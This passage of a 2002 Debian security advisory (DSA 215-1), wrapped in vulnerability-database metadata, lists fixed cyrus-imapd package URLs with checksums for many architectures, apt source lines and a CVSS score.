bfaab8f6db81dd162081f4c236a4d960\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 416850 42ab62c6c0dcd027f4b6b21b460d1260\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 75634 c151f3ea81e738188cead441a2110c13\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_i386.deb\n Size/MD5 
checksum: 123420 962e0e7cc9109f34c1768188e16cc72f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 119822 3161e49d86884f326438d01b1b099bf0\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 56208 bfdc5c727911f19a43ee75d6de4d0d41\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 48776 4c64370ec2849b6c95ebc44de4cfc291\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 656724 cddf516677920ad5606e87d2609e8521\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 93280 ac7d194234d19aa602de3900117e6620\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 198040 a399fe746566a9a80a57a0596258f0b2\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 192390 e412c82b348b7a784bbac9d7ea1c6f3a\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 90216 4ac43c84ed9b9a5fe7e287bf7127e536\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 42166 886143111f6cce37876e12ffabddcfc8\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 484634 dc48dd627b15e2fcb704a68e7c9a38c8\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 83920 dcabdba1473ed8599b4f4acac5e7f7bd\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 145566 d43d7edadce853267d7aa5856760b912\n 
http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 141960 3a5ba8eae1f255d90354271c0e6462f3\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 65818 8d1969626dc7f19b63aebb99ca37fd81\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 37904 c1881ce09f8855371ccbbe3e24af7ff5\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 387510 b3372c02bc627e71f3c58942676e6c73\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 74290 7d05c013116eef0a9bb67964879e08da\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 113354 86d9e65b7d2d719a42bf3016a2758d4d\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 112042 a56badde3ffa2dab1152575be2b043b1\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 52274 794a80d582276a4a5c67c05d98dca50e\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 41522 00a7aed0c34fff8c88fc91efd1d9f1a0\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 481446 772899fac06ed55e62e36ab711e0201e\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 83226 20aed297c07c8eec8f4b0ae3891c81d7\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 141616 494b49f1866e2b4849b41d25359178c4\n 
http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 140252 0db3dcac7dd3762c858234bf5b40bf2a\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 65700 3852d4c333200d476240e7c63626e2f0\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 41650 43b8fe90f0a1b3b0bc7479a6a773725f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 486124 79be4f0ea1ca2bafc7a4cb1a01c099cb\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 83324 52f8b0e955dd2c67fb984330517a1a0d\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 143844 b19880c3f1c0c5d1562162098fced833\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 141796 371b7d6898e2ccb91bc165de28203169\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 66146 1c03a95b5983c6ba4cb2a27ba7aeb5bf\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 40158 9dd472cdf3509dcc5e065482e6d77ffd\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 457326 2b72dd98148c854f465500bc345c7eaf\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 80854 49c45a1c59010673ba167bf0331fa0dc\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 134930 36e0dfb12165ad289172d85a77bbf29f\n 
http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 133402 d4db29ae6f4d6802e02bcdb66a61a0e2\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 62370 f82988c569a94f368d8c5cc7df98f007\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 40578 a55de3a30940aa8af266d06fb709bbcf\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 425896 897c5163ff6f81f613b542668508f624\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 77720 fa632ff17ca7f2b7c03b2dc0bd822d40\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 127438 af839029be317f76e569373215212d54\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 122952 babf1fc12682d6c61316a335c5ae2530\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 58376 80609b6a3f1bc1801a1635be6a054981\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 39810 95d1263c795e9fde2650106b620f1bad\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 435842 83ecee19b8dc92aaa6fb881c27b80dde\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 79284 93ed311588e9922541f263dba2eac56f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 130800 fedae0b42f33ea5e4a79bcd7b87e52cc\n 
http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 126886 a61b3c09914174a523855c4571064ddb\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 60116 7c15618cbcc041fbc774577e6baed0f6\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2002-12-23T00:00:00", "published": "2002-12-23T00:00:00", "id": "DEBIAN:DSA-215-1:31563", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00142.html", "title": "[SECURITY] [DSA 215-1] New cyrus-imapd packages fix remote command execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}